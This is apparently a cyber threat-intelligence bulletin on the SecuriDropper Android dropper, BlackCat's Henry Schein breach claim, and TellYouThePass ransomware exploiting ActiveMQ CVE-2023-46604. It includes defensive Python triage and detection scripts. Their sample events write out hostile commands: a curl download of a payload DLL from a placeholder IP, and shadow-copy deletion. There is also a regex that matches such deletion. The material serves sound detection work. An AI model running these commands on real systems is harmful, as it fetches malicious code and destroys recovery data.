Researchers Detail Dropper-as-a-Service Operation "SecuriDropper" Bypassing Android's "Restricted Settings" Feature
Researchers have published a new report detailing “SecuriDropper,” a Dropper-as-a-Service (DaaS) operation that has been observed bypassing the "Restricted Settings" security measure introduced in Android 13 by Google.
- The "Restricted Settings" measure does not block sideloading itself; it restricts the privileges that a sideloaded application (one installed from a source other than a recognized app store, typically anything outside the legitimate Google Play Store) can obtain. Researchers detailed that the feature prevents such applications from being granted “Notification Listener” access or accessibility service access, both of which are commonly sought out and abused by malware.
- Droppers are primarily used to install a payload on a compromised device and are notorious for giving threat actors the ability to "separate the development and execution of an attack from the installation of malware."
- DaaS operations offer a two (2) stage process that increases the difficulty of detection. The first stage involves the distribution of a malicious application that appears legitimate; once installed, it fetches and installs the secondary payload onto the device. SecuriDropper utilizes a different Android API (Application Programming Interface) than its predecessors to install its payload, which the researchers note is “mimicking the process used by marketplaces to install new applications.”
Researchers explained that, with this specific API, the compromised device's operating system cannot differentiate between the fraudulent application and a legitimate marketplace, so the secondary payload is installed without the “Restricted Settings” protections being applied to it. Technical details of the SecuriDropper DaaS operation as well as indicators of compromise (IOCs) can be viewed in the report linked below.
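One practical check that follows from the point above: Android records which package installed each application, and `adb shell pm list packages -i -3` prints that attribution for third-party packages as `package:<name>  installer=<installer>` (`installer=null` when there is none). A dropper that installs its payload through the same path a store uses will generally appear as the payload's installer, so packages installed by something other than a trusted store, and the installing app itself, deserve a closer look during device triage. The script below is an added example written for this update, not code from the researchers' report or from Android; the trusted-store set, the package names and the sample `pm` output are all constructed assumptions.

```python
"""Triage `pm list packages -i -3` output for non-store installer attribution.

Added example (not from the SecuriDropper report or from Android itself).
TRUSTED_STORES and SAMPLE_PM_OUTPUT are constructed for the example.
"""
import re
from typing import Dict, List, Optional, Tuple

# Installer package names we treat as legitimate stores (assumption; extend
# with OEM stores such as a vendor's own app gallery where applicable).
TRUSTED_STORES = {"com.android.vending"}  # Google Play

# `pm list packages -i` prints one package per line in this shape.
LINE_RE = re.compile(r"^package:(?P<pkg>\S+)\s+installer=(?P<inst>\S+)\s*$")

# Constructed sample output resembling `adb shell pm list packages -i -3`.
SAMPLE_PM_OUTPUT = """\
package:com.android.chrome  installer=com.android.vending
package:com.example.altstore  installer=com.android.vending
package:com.example.game  installer=com.example.altstore
package:com.example.fakeupdater  installer=null
package:com.example.payload  installer=com.example.fakeupdater
package:com.example.orphan  installer=com.example.gone
"""


def parse_pm_list(text: str) -> Dict[str, Optional[str]]:
    """Map package name -> installer package (None when Android has no attribution)."""
    packages: Dict[str, Optional[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unexpected pm output line: {line!r}")
        inst = m.group("inst")
        packages[m.group("pkg")] = None if inst == "null" else inst
    return packages


def classify(packages: Dict[str, Optional[str]],
             trusted=TRUSTED_STORES) -> List[Tuple[str, str, str]]:
    """Return (package, verdict, reason) for every package not attributed to a trusted store."""
    findings = []
    for pkg, inst in packages.items():
        if inst in trusted:
            continue  # store-attributed: nothing to flag
        if inst is None:
            findings.append((pkg, "sideloaded", "no installer attribution (manual sideload or adb)"))
        elif inst not in packages:
            # Droppers commonly remove themselves once the payload is in place.
            findings.append((pkg, "installer-missing", f"installed by {inst}, which is no longer present"))
        elif packages[inst] in trusted:
            findings.append((pkg, "third-party-installer", f"installed by {inst}, which itself came from a trusted store"))
        else:
            findings.append((pkg, "possible-dropper-chain", f"installed by {inst}, which is neither a trusted store nor store-attributed"))
    return findings


def installers_to_review(packages: Dict[str, Optional[str]],
                         trusted=TRUSTED_STORES) -> Dict[str, List[str]]:
    """Group flagged packages by the non-store app that installed them (dropper candidates)."""
    by_installer: Dict[str, List[str]] = {}
    for pkg, inst in packages.items():
        if inst is not None and inst not in trusted:
            by_installer.setdefault(inst, []).append(pkg)
    return by_installer


if __name__ == "__main__":
    pkgs = parse_pm_list(SAMPLE_PM_OUTPUT)
    for pkg, verdict, reason in classify(pkgs):
        print(f"{verdict:22} {pkg:28} {reason}")
    for inst, installed in installers_to_review(pkgs).items():
        print(f"review installer {inst}: installed {', '.join(installed)}")
```

Run it against real output by piping `adb shell pm list packages -i -3` into `parse_pm_list`; the `-3` flag matters, since system packages also carry `installer=null` and would otherwise drown the sideloaded entries.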
Threat Actor Activity
BlackCat Ransomware Gang Claims Breach on Healthcare Giant
The BlackCat ransomware group (otherwise known as ALPHV) has recently claimed that they have successfully compromised the networks of the major United States healthcare solutions provider Henry Schein. Henry Schein disclosed mid-October 2023 that they had experienced a cyberattack affecting their manufacturing and distribution operations, which required the organization to take some of their systems offline.
The company proceeded by involving law enforcement as well as additional external experts to assist with containing the attack and recommended that customers place orders through their specified Henry Schein representative or the company's telesales phone number.
Approximately two weeks later, BlackCat added Henry Schein to their dark web leak site claiming to have access to thirty-five (35) terabytes of sensitive data, including payroll data and shareholder information.
- Citing failed ongoing negotiations, the threat actors claimed to have re-encrypted the company's devices as Henry Schein was in the process of restoring their systems.
- After releasing internal payroll data and shareholder folders, the published data and the company’s overall entry were deleted from the leak site, which typically indicates either that a settlement has been reached or that new ransom negotiations are underway.
CTIX analysts will continue to monitor BlackCat’s activity and release updates when applicable.
“TellYouThePass” Ransomware Observed Targeting Critical RCE Vulnerability in Public-Facing Apache Servers
“TellYouThePass,” a ransomware variant first discovered in 2019, has resurfaced in attacks on internet-facing Apache ActiveMQ servers exploiting CVE-2023-46604. This is a critical vulnerability (CVSS score 10.0) published in late October 2023 that has already been widely exploited. It allows remote attackers to execute shell commands on servers running an affected version.
On November 1, 2023, researchers released a report detailing how CVE-2023-46604 was being exploited to deploy "HelloKitty" ransomware on customer Apache ActiveMQ servers, while additional researchers identified evidence of the same CVE being used to deploy "SparkRAT" malware.
According to researchers, TellYouThePass has been deployed onto Apache ActiveMQ servers using the same techniques, file encryption flow, and file enumeration flow as HelloKitty. Additionally, a number of Bitcoin wallets, IP addresses, and email addresses were shared between the TellYouThePass and HelloKitty attacks utilizing CVE-2023-46604.
- For ActiveMQ servers, the attack is initiated by a crafted request to the exposed ActiveMQ service. The resulting command execution spawns a cmd.exe process that downloads two (2) files, ultimately dropping a .NET DLL onto the system.
- This DLL does not use obfuscation, which allowed researchers to see its similarity with earlier versions of TellYouThePass. The ransomware attempts to delete Volume Shadow Copy (VSS) snapshots to make system recovery more difficult, encrypts the system, and then drops a ransom note titled “READ_ME4.html.”
- Apache has already released patched versions for this CVE and is directing users to update their environments immediately. Despite this, over 9,200 Apache ActiveMQ servers remained exposed to the internet as of November 5, 2023, more than half of them still vulnerable to CVE-2023-46604.
CTIX recommends that organizations update any Apache ActiveMQ systems or devices currently in use to address this vulnerability and the ransomware exploiting it. Additionally, CTIX will continue to monitor the ongoing ransomware campaigns involving this vulnerability, including the deployment of TellYouThePass.
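The two things a defender needs from the chain above are a version triage and a behavioural detection, so here is an added example covering both; it is written for this update and is not tooling from Apache, Rapid7, Arctic Wolf, SOC Prime or Ankura. `vulnerability_status()` compares an ActiveMQ version string against the fixed releases Apache's advisory names for CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6, 5.18.3; branches the table does not cover are reported as unknown rather than guessed). `find_chain_indicators()` runs the chain described in the bullets (ActiveMQ's Java process spawning cmd.exe, shadow-copy deletion, the READ_ME4.html note) over Sysmon-style process and file events. The event field names follow Sysmon's conventions and the sample events are constructed; the download command and paths in them are illustrative, not observed IOCs.

```python
"""Triage helpers for the CVE-2023-46604 / TellYouThePass chain.

Added example, not vendor or Apache tooling. SAMPLE_EVENTS is constructed;
field names (Image, ParentImage, CommandLine, ParentCommandLine,
TargetFilename) follow Sysmon's process-create and file-create events.
"""
import re
from typing import Dict, List, Tuple

# First fixed release per branch, from Apache's advisory for CVE-2023-46604.
FIXED_VERSIONS = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(version: str) -> Tuple[int, int, int]:
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def vulnerability_status(version: str) -> str:
    """'vulnerable', 'fixed', or 'unknown' for branches the advisory table does not cover."""
    v = parse_version(version)
    fixed = FIXED_VERSIONS.get(v[:2])
    if fixed is not None:
        return "vulnerable" if v < fixed else "fixed"
    if v < (5, 15, 0):
        return "vulnerable"  # advisory: everything before 5.15.16 is affected
    return "unknown"         # 5.19+/6.x: check the advisory, do not assume


# Shadow-copy deletion as seen from the command line (vssadmin or wmic).
SHADOW_DELETE_RE = re.compile(
    r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", re.I)
RANSOM_NOTE = "read_me4.html"


def _parent_is_activemq_java(event: Dict[str, str]) -> bool:
    """The broker runs as java.exe with 'activemq' somewhere on its command line."""
    return (event.get("ParentImage", "").lower().endswith("java.exe")
            and "activemq" in event.get("ParentCommandLine", "").lower())


def find_chain_indicators(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs in event order for the stages of the chain."""
    hits: List[Tuple[str, str]] = []
    for e in events:
        kind = e.get("EventType")
        if kind == "ProcessCreate":
            cmdline = e.get("CommandLine", "")
            if _parent_is_activemq_java(e) and e.get("Image", "").lower().endswith("cmd.exe"):
                hits.append(("activemq_spawns_cmd", cmdline))      # stage 1: RCE -> cmd.exe
            if SHADOW_DELETE_RE.search(cmdline):
                hits.append(("shadow_copy_deletion", cmdline))     # anti-recovery step
        elif kind == "FileCreate":
            target = e.get("TargetFilename", "")
            if target.lower().endswith(RANSOM_NOTE):
                hits.append(("ransom_note_written", target))       # post-encryption note
    return hits


# Constructed sample: three malicious events plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "ParentCommandLine": r"java -Dactivemq.home=C:\apache-activemq-5.18.2 org.apache.activemq.console.Main start",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl -o C:\Windows\Temp\stage.dll http://203.0.113.5/stage.dll"},
    {"EventType": "ProcessCreate",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventType": "FileCreate",
     "Image": r"C:\Windows\Temp\loader.exe",
     "TargetFilename": r"C:\Users\Public\READ_ME4.html"},
    {"EventType": "ProcessCreate",  # benign: a non-ActiveMQ java process running a build step
     "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe", "ParentCommandLine": "java -jar jenkins.war",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c git --version"},
    {"EventType": "ProcessCreate",  # benign: listing, not deleting, shadow copies
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin.exe list shadows"},
]

if __name__ == "__main__":
    for ver in ("5.18.2", "5.18.3", "5.14.5", "6.0.0"):
        print(ver, vulnerability_status(ver))
    for rule, evidence in find_chain_indicators(SAMPLE_EVENTS):
        print(rule, "->", evidence)
```

The parent-command-line check is what keeps the first rule usable on hosts that run other Java services: any java.exe spawning cmd.exe is far too noisy, while an ActiveMQ broker doing so is not something a healthy deployment does.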
- BleepingComputer: TellYouThePass Ransomware Article
- Rapid7: CVE-2023-46604 Report
- Arctic Wolf: CVE-2023-46604 Report
- SOC Prime: CVE-2023-46604 Report
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (firstname.lastname@example.org) if additional context is needed.
© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.